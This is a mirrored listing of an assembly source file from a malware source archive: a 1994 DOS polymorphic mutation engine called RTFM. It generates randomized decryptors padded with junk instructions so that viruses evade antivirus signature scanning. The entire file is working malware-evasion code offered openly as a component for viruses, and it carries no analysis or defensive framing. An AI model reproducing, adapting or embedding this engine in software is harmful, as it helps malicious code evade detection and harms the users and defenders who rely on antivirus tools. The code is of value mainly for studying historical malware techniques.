mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 15:05:27 +00:00
325 lines
9.5 KiB
NASM
325 lines
9.5 KiB
NASM
|
;------------------------------------------------------------------------------
|
||
|
;
|
||
|
; Rajaats Tiny Flexible Mutator (RTFM) V1.1 (C) 1994 by Rajaat
|
||
|
;
|
||
|
; Purpose : making it impossible to use scan strings
|
||
|
;
|
||
|
; Input :
|
||
|
; DS:SI = piece of code to encrypt
|
||
|
; ES:SI = place of decryptor+encrypted code
|
||
|
; CX = length of code (include the mutator (mut_len))
|
||
|
; BX = offset of decryptor in file
|
||
|
; AX = flag bits
|
||
|
; 0 = 1 do not use junk code
|
||
|
; Output :
|
||
|
; DS:DX = place of decryptor+encrypted code
|
||
|
; CX = length of encrypted code+decryptor
|
||
|
; BP = preserved
|
||
|
; Other registers might be trashed
|
||
|
;
|
||
|
; History :
|
||
|
; 1.0 initial version
|
||
|
; 1.1 the decrease counter can get an add or sub
|
||
|
; the increase pointer can get an add or sub
|
||
|
; added random byte operation with one register as trash function
|
||
|
;
|
||
|
;------------------------------------------------------------------------------
|
||
|
SMART
|
||
|
JUMPS
|
||
|
|
||
|
_text segment 'text'
|
||
|
assume cs:_text
|
||
|
|
||
|
.radix 16
|
||
|
|
||
|
public mut_top
|
||
|
public mut_bottom
|
||
|
public mut_len
|
||
|
public rnd_init
|
||
|
public rnd_get
|
||
|
public mutate
|
||
|
|
||
|
dos_get_time equ 2c
|
||
|
dos_get_date equ 2a
|
||
|
|
||
|
mut_bottom = $
|
||
|
reg enum _ax,_cx,_dx,_bx,_sp,_bp,_si,_di
|
||
|
|
||
|
seed dw 0
|
||
|
count dw 0
|
||
|
ofs dw 0
|
||
|
dest dw 0
|
||
|
indexbyte db 00000000b
|
||
|
countbyte db 00000000b
|
||
|
process db 00000000b ; bit 0 : 1 = count register set up
|
||
|
; 1 : 1 = index register set up
|
||
|
; 2 : 1 = don't use junk code
|
||
|
|
||
|
decraddr dw 0
|
||
|
loopaddr dw 0
|
||
|
|
||
|
opertab db 30,0,28
|
||
|
trash equ $
|
||
|
cmc
|
||
|
clc
|
||
|
stc
|
||
|
nop
|
||
|
|
||
|
mutate: push bp
|
||
|
push ds
|
||
|
push es
|
||
|
push si
|
||
|
call mut_delta
|
||
|
mut_delta: pop bp
|
||
|
sub bp,offset mut_delta
|
||
|
mov byte ptr cs:[process][bp],0
|
||
|
mov byte ptr cs:[indexbyte][bp],0
|
||
|
mov byte ptr cs:[countbyte][bp],0
|
||
|
mov word ptr cs:[count][bp],cx
|
||
|
mov word ptr cs:[ofs][bp],bx
|
||
|
mov word ptr cs:[dest][bp],di
|
||
|
test al,1
|
||
|
jnz usejunk
|
||
|
or byte ptr cs:[process][bp],4
|
||
|
usejunk: call rnd_init
|
||
|
setaction: mov al,byte ptr cs:[process][bp]
|
||
|
and al,3
|
||
|
cmp al,3
|
||
|
jz setregsok
|
||
|
jmp setregs
|
||
|
setregsok: call insert_trash
|
||
|
mov word ptr cs:[loopaddr][bp],di
|
||
|
mov ax,802e
|
||
|
stosw
|
||
|
getoper: call rnd_get
|
||
|
and ax,3
|
||
|
or al,al
|
||
|
jz getoper
|
||
|
mov bx,ax
|
||
|
add bx,bp
|
||
|
push ds
|
||
|
push cs
|
||
|
pop ds
|
||
|
lea si,opertab[bx-1]
|
||
|
lodsb
|
||
|
pop ds
|
||
|
mov byte ptr cs:[action][bp],al
|
||
|
cmp al,30
|
||
|
jz noaddsubflip
|
||
|
xor byte ptr cs:[action][bp],28
|
||
|
noaddsubflip: add al,byte ptr cs:[indexbyte][bp]
|
||
|
test al,4
|
||
|
jnz toomuch
|
||
|
xor al,6
|
||
|
toomuch: xor al,2
|
||
|
stosb
|
||
|
call rnd_get
|
||
|
stosb
|
||
|
push ax
|
||
|
call insert_trash
|
||
|
call rnd_get
|
||
|
test al,1
|
||
|
jnz ptrinc
|
||
|
test al,2
|
||
|
jnz ptrsub
|
||
|
mov ax,0c083
|
||
|
add ah,byte ptr cs:[indexbyte][bp]
|
||
|
stosw
|
||
|
mov al,01
|
||
|
stosb
|
||
|
jmp makecount
|
||
|
ptrsub: mov ax,0e883
|
||
|
add ah,byte ptr cs:[indexbyte][bp]
|
||
|
stosw
|
||
|
mov al,0ffh
|
||
|
stosb
|
||
|
jmp makecount
|
||
|
ptrinc: mov al,40
|
||
|
add al,byte ptr cs:[indexbyte][bp]
|
||
|
stosb
|
||
|
makecount: call insert_trash
|
||
|
call rnd_get
|
||
|
test al,1
|
||
|
jnz countdec
|
||
|
test al,2
|
||
|
jnz countsub
|
||
|
mov ax,0c083
|
||
|
add ah,byte ptr cs:[countbyte][bp]
|
||
|
stosw
|
||
|
mov al,0ff
|
||
|
stosb
|
||
|
jmp makeloop
|
||
|
countsub: mov ax,0e883
|
||
|
add ah,byte ptr cs:[countbyte][bp]
|
||
|
stosw
|
||
|
mov al,01
|
||
|
stosb
|
||
|
jmp makeloop
|
||
|
countdec: mov al,48
|
||
|
add al,byte ptr cs:[countbyte][bp]
|
||
|
stosb
|
||
|
makeloop: mov al,75
|
||
|
stosb
|
||
|
mov ax,word ptr cs:[loopaddr][bp]
|
||
|
sub ax,di
|
||
|
dec ax
|
||
|
stosb
|
||
|
call insert_trash
|
||
|
mov ax,di
|
||
|
sub ax,word ptr cs:[dest][bp]
|
||
|
add ax,word ptr cs:[ofs][bp]
|
||
|
push di
|
||
|
mov di,word ptr cs:[decraddr][bp]
|
||
|
stosw
|
||
|
pop di
|
||
|
pop ax
|
||
|
xchg al,ah
|
||
|
pop si
|
||
|
mov cx,word ptr cs:[count][bp]
|
||
|
encrypt: lodsb
|
||
|
action equ $
|
||
|
db 0,0e0
|
||
|
stosb
|
||
|
loop encrypt
|
||
|
mov cx,di
|
||
|
mov dx,word ptr cs:[dest][bp]
|
||
|
sub cx,dx
|
||
|
pop es
|
||
|
pop ds
|
||
|
pop bp
|
||
|
ret
|
||
|
|
||
|
setregs: call insert_trash
|
||
|
call rnd_get
|
||
|
test al,1
|
||
|
jnz firstcount
|
||
|
testflag byte ptr cs:[process][bp],2
|
||
|
jnz return
|
||
|
setflag byte ptr cs:[process][bp],2
|
||
|
call set_index
|
||
|
jmp setaction
|
||
|
firstcount: testflag byte ptr cs:[process][bp],1
|
||
|
jnz return
|
||
|
setflag byte ptr cs:[process][bp],1
|
||
|
call set_count
|
||
|
return: jmp setaction
|
||
|
|
||
|
set_index: call rnd_get
|
||
|
and al,1
|
||
|
or al,6
|
||
|
test ah,1
|
||
|
jz nobx
|
||
|
mov al,_bx
|
||
|
nobx: cmp al,byte ptr cs:[countbyte][bp]
|
||
|
jz set_index
|
||
|
mov byte ptr cs:[indexbyte][bp],al
|
||
|
add al,0b8
|
||
|
stosb
|
||
|
mov word ptr cs:[decraddr][bp],di
|
||
|
stosw
|
||
|
ret
|
||
|
|
||
|
set_count: call rnd_get
|
||
|
and al,7
|
||
|
cmp al,byte ptr cs:[indexbyte][bp]
|
||
|
jz set_count
|
||
|
cmp al,_sp
|
||
|
jz set_count
|
||
|
mov byte ptr cs:[countbyte][bp],al
|
||
|
add al,0b8
|
||
|
stosb
|
||
|
mov ax,word ptr cs:[count][bp]
|
||
|
stosw
|
||
|
ret
|
||
|
|
||
|
insert_trash: test byte ptr cs:[process][bp],4
|
||
|
jnz trasher
|
||
|
ret
|
||
|
trasher: call rnd_get
|
||
|
test ah,1
|
||
|
jnz specialtrash
|
||
|
and ax,3
|
||
|
or ax,ax
|
||
|
jz trash_done
|
||
|
mov cx,ax
|
||
|
more_trash: call rnd_get
|
||
|
and ax,3
|
||
|
lea bx,trash[bp]
|
||
|
add bx,ax
|
||
|
mov al,byte ptr cs:[bx]
|
||
|
stosb
|
||
|
loop more_trash
|
||
|
trash_done: ret
|
||
|
specialtrash: call rnd_get
|
||
|
and al,7
|
||
|
cmp al,_sp
|
||
|
jz specialtrash
|
||
|
cmp al,byte ptr cs:[indexbyte][bp]
|
||
|
je specialtrash
|
||
|
cmp al,byte ptr cs:[countbyte][bp]
|
||
|
je specialtrash
|
||
|
test ah,1
|
||
|
jz domov
|
||
|
test ah,2
|
||
|
jz doinc
|
||
|
test ah,4
|
||
|
jz dodec
|
||
|
mov al,083
|
||
|
stosb
|
||
|
regtrash: call rnd_get
|
||
|
mov ah,al
|
||
|
and al,7
|
||
|
cmp al,_sp
|
||
|
jz regtrash
|
||
|
cmp al,byte ptr cs:[indexbyte][bp]
|
||
|
jz regtrash
|
||
|
cmp al,byte ptr cs:[countbyte][bp]
|
||
|
jz regtrash
|
||
|
mov al,ah
|
||
|
or al,0c0
|
||
|
stosb
|
||
|
call rnd_get
|
||
|
stosb
|
||
|
ret
|
||
|
dodec: add al,8
|
||
|
doinc: add al,40
|
||
|
stosb
|
||
|
ret
|
||
|
domov: add al,0b8
|
||
|
storeit: stosb
|
||
|
call rnd_get
|
||
|
stosw
|
||
|
ret
|
||
|
|
||
|
rnd_init: mov ah,dos_get_time
|
||
|
int 21
|
||
|
xor cx,dx
|
||
|
mov word ptr cs:[seed][bp],cx
|
||
|
mov ah,dos_get_date
|
||
|
int 21
|
||
|
mov cl,al
|
||
|
rcr dx,cl
|
||
|
not dx
|
||
|
sbb word ptr cs:[seed][bp],dx
|
||
|
ret
|
||
|
rnd_get: push bx
|
||
|
mov bx,word ptr cs:[seed][bp]
|
||
|
in al,40
|
||
|
xchg ah,al
|
||
|
in al,40
|
||
|
xor ax,bx
|
||
|
sbb ax,bx
|
||
|
ror ax,1
|
||
|
mov word ptr cs:[seed][bp],ax
|
||
|
pop bx
|
||
|
ret
|
||
|
|
||
|
db '[RTFM]'
|
||
|
|
||
|
mut_top = $
|
||
|
mut_len = mut_top-mut_bottom+0fh
|
||
|
|
||
|
_text ends
|
||
|
end
|
||
|
|